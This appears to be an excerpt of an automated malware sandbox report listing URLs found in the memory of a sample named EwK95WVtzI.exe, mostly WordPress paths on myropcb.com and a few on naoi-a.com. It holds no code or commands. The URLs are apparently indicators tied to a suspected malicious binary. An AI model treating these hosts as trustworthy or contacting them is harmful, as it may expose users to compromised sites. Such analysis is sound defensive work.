                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/thematic-dropdowns.js
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/classic-themes.min.css?ver=6.2.2
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/wlwmanifest.xml
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2785021069.00000000077E1000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.myropcb.com%2F
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.myropcb.com%2F&format=xml
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2785021069.00000000077E1000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/wp/v2/pages/28
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/xmlrpc.php
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/xmlrpc.php?rsd
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.naoi-a.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.naoi-a.com/#
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.naoi-a.com/C
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.naoi-a.com/b
